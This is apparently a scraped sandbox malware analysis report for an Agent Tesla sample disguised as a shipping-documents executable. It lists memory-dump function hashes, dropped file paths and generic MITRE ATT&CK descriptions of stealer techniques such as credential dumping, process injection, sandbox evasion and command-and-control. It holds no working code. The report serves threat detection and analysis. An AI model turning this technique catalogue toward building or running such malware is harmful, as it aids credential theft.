String ID: fbq$XPbq$\Obq$x=6'$x=6'
API String ID: 0-459809451
Opcode ID: e050848227933e2c3c21c18bb6491df3f82203d562ba59d9184a2cf187e31a25
Instruction ID: d334474cee1d6e740d659cc264888db713a555ba988db88069676f7eda85bad5
Opcode Fuzzy Hash: e050848227933e2c3c21c18bb6491df3f82203d562ba59d9184a2cf187e31a25
Instruction Fuzzy Hash: 35616D31F002189FDB159FA8C854B9EBAF6EF88304F208429E50AEB395DA758D418B91

Function 279A8498 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$]q, xrefs: 279A8757
$]q, xrefs: 279A8763
$]q, xrefs: 279A86FE
$]q, xrefs: 279A86F2

Memory Dump Source

Source File: 00000006.00000002.3310868824.00000000279A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 279A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_279a0000_msiexec.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: d85302a28e6bb1c93c97efc77c9befff59e10db8c100bbd82b08cfbe30877509
Instruction ID: 45bebd6a9766e47c04d19af03a48af9ebb665a6fde6971974d3214a2f6445561
Opcode Fuzzy Hash: d85302a28e6bb1c93c97efc77c9befff59e10db8c100bbd82b08cfbe30877509
Instruction Fuzzy Hash: 68B12D30A01209CFDB1ADFA8C595A9EB7B6FF84305F248869D405AB395DB35DD82CB81

Function 279A9210 Relevance: 5.2, Strings: 4, Instructions: 231COMMON

Download Yara Rule

Strings

$]q, xrefs: 279A928C
$]q, xrefs: 279A9280
$]q, xrefs: 279A92C7
$]q, xrefs: 279A92BB

Memory Dump Source

Source File: 00000006.00000002.3310868824.00000000279A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 279A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_279a0000_msiexec.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: b1347d3f77bf3983b8eb7041fc004d2967c89359f2e679a13fda612c4a5ecbc4
Instruction ID: 7c6381692ef1884435e9cbfeff967242652de4443c03eba7a0e74c747975f2b5
Opcode Fuzzy Hash: b1347d3f77bf3983b8eb7041fc004d2967c89359f2e679a13fda612c4a5ecbc4
Instruction Fuzzy Hash: 7B915030B1030A8FDB54DF69C990B9EB3F6FF84214F108565C809EB385EE749D468B92

Function 279AAD88 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

$]q, xrefs: 279AAEB9
$]q, xrefs: 279AAF3B
$]q, xrefs: 279AAF0C
$]q, xrefs: 279AAF64

Memory Dump Source

Source File: 00000006.00000002.3310868824.00000000279A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 279A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_279a0000_msiexec.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 7958aa1dcc1052a8891d0455641268c850729e10adea1afad48f8b71a4258720
Instruction ID: a995dc85ce7a4f4ae89bf13a0ef094b9f84540df1b95971ac41128f2311bf312
Opcode Fuzzy Hash: 7958aa1dcc1052a8891d0455641268c850729e10adea1afad48f8b71a4258720
Instruction Fuzzy Hash: 2F51C130A01305CFCB19DF68C585A9EB3BAEF84319F20856AE405EB356DB38DD41CB89

Function 279A88B0 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

$]q, xrefs: 279A893B
LR]q, xrefs: 279A89F2
$]q, xrefs: 279A892F
LR]q, xrefs: 279A89A3

Memory Dump Source

Source File: 00000006.00000002.3310868824.00000000279A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 279A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_279a0000_msiexec.jbxd

Similarity

API ID:
String ID: LR]q$LR]q$$]q$$]q
API String ID: 0-3527005858
Opcode ID: 828178dc0b489a4eb701360d48e615d9389d43cd8900c1de2819a526fa4bc86a
Instruction ID: 2fa92272aaa88ebd696768ceedfce902c418bcf1377c501b7ce3c9aff1d31408
Opcode Fuzzy Hash: 828178dc0b489a4eb701360d48e615d9389d43cd8900c1de2819a526fa4bc86a
Instruction Fuzzy Hash: 44519E307113019FDB1ADF68C986E5AB7AAFF84308F1485A9E4069B3A5DA74EC41CBD1

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Shipping documents 000309498585956000797900.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5jbxwh01.chs.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qoe1livw.2w1.ps1

C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll

C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Cosmopolitanising.col

C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Laccolitic51.Suk151

C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Prefaces.Jal

C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Shipping documents 000309498585956000797900.exe

C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Shipping documents 000309498585956000797900.exe:Zone.Identifier

C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\bevidstheds.cir

C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\formellommeregneren.jul

C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\noncomputation.ove

C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\sedulousness.hal

C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\subjects.pos

C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\villagy.txt

Windows Analysis Report
Shipping documents 000309498585956000797900.exe

Function 7347114E Relevance: 116.2, APIs: 57, Strings: 9, Instructions: 700
filestringmemoryCOMMON

Function 004036FC Relevance: 87.9, APIs: 32, Strings: 18, Instructions: 416
stringfilecomCOMMON

Function 00404B30 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 295
windowclipboardmemoryCOMMON

Function 00406719 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 155
filestringCOMMON

Function 00404F92 Relevance: 63.4, APIs: 35, Strings: 1, Instructions: 374
windowstringCOMMON

Function 00405A3E Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 225
stringregistryCOMMON

Function 0040154A Relevance: 35.4, APIs: 17, Strings: 3, Instructions: 441
stringtimesleepCOMMON

Function 004033ED Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 178
memoryCOMMON

Function 00405EBA Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 209
stringCOMMON

Function 00405D3A Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 76
stringwindowCOMMON

Function 00403148 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 167
COMMON

Function 0040619E Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre